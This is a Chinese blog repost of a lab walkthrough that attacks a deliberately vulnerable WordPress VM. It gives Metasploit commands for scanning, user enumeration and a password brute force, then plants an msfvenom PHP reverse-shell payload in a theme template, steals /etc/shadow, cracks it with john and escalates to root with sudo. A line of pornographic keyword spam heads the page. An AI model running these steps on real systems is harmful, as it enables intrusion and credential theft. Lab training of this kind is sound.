日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

暴力破解漏洞

發(fā)布時間:2023/12/14 编程问答 37 豆豆
生活随笔 收集整理的這篇文章主要介紹了 暴力破解漏洞 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

暴力破解漏洞實現(xiàn)原理

暴力破解的產(chǎn)生是由于服務(wù)器沒有做限制,導(dǎo)致攻擊者可以通過暴力的手段破解所需信息,如用戶名、密碼、驗證碼等。暴力破解需要一個龐大的字典,如4位數(shù)字的驗證碼,那么暴力破解的范圍就是0000~9999,暴力破解的關(guān)鍵在于字典的大小。

靶機搭建

鏈接:https://pan.baidu.com/s/1Zw_huwIenjGTXUteftOuUw
提取碼:vuq6

漏洞復(fù)現(xiàn)

  • 使用netdiscover發(fā)現(xiàn)存活主機
  • netdiscover -i eth0

  • 使用nmap,nikto進行信息探測
  • nmap -sV 192.168.101.48 nikto -host http://192.168.101.48


  • 發(fā)現(xiàn)了secret這個敏感目錄,登錄該目錄下嘗試進入login后臺失敗
    • 修改/etc/hosts文件,添加多一條域名解析記錄就可成功訪問
  • 首先我們必須知道該網(wǎng)站都存在哪些用戶名,我們這里使用wpscan來對該網(wǎng)站的用戶名進行暴力破解
  • wpscan --url http://vtcsec/secret --enumerate u
    • 破解到一個admin的賬號
  • 接下來我們的重頭戲來了!使用msfconsole對其密碼進行暴力窮舉
  • msfconsole use auxiliary/scanner/http/wordpress_login_enum set rhosts 靶機IP set username admin set pass_file /usr/share/wordlists/dirb/common.txt set targeturi /secret/ run
    • 破解出用戶名和密碼均為admin
  • 在利用handler模塊進行監(jiān)聽反彈shell,也是在msf中進行
  • back use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost 本機IP run
  • 登錄后臺后,找到editors目錄下的404Template,使用生成的靜荷替換404模板里的內(nèi)容
  • msfvenom -p php/meterpreter/reverse_tcp lhost=本機IP lport=4444 -f raw

  • 在URL中輸入以下網(wǎng)址,即可反彈shell
  • http://靶機IP/secret/wp-content/themes/twentyseventeen/404.php
    • 注:這里的twentyseventeen指的是這里的小寫值
  • shell反彈成功,但是發(fā)現(xiàn)只是一個普通的www-data賬戶,我們輸入以下命令進入命令行界面
    • 下載靶機的passwd和shadow散列值到kali本機的根目錄下
    download /etc/passwd download /etc/shadow
    • 在kali本機中進行john的暴力破解,破解到了一個用戶名密碼均為marlinspike
    unshadow passwd shadow > cracked john cracked
    • 注:這里解釋一下unshadow這個命令,這個命令是將密碼文件和密碼的散列值進行組裝的一個命令,專門配合john命令來使用的
  • 在msf中進行提權(quán)
  • shell python -c "import pty;pty.spawn('/bin/bash')" su - marlinspike
    • 進入marlinspike賬戶后,查看該用戶sudo能執(zhí)行的權(quán)限,發(fā)現(xiàn)是root的所有執(zhí)行權(quán)限,賺大發(fā)了!果斷使用sudo bash命令提權(quán)

    總結(jié):其實暴力破解在實戰(zhàn)中也是很常用的一種方式,在滲透測試者收集到的有用信息極少極少時,便可以嘗試暴力破解的方式,但成功率完全取決于字典大小

    總結(jié)

    以上是生活随笔為你收集整理的暴力破解漏洞的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。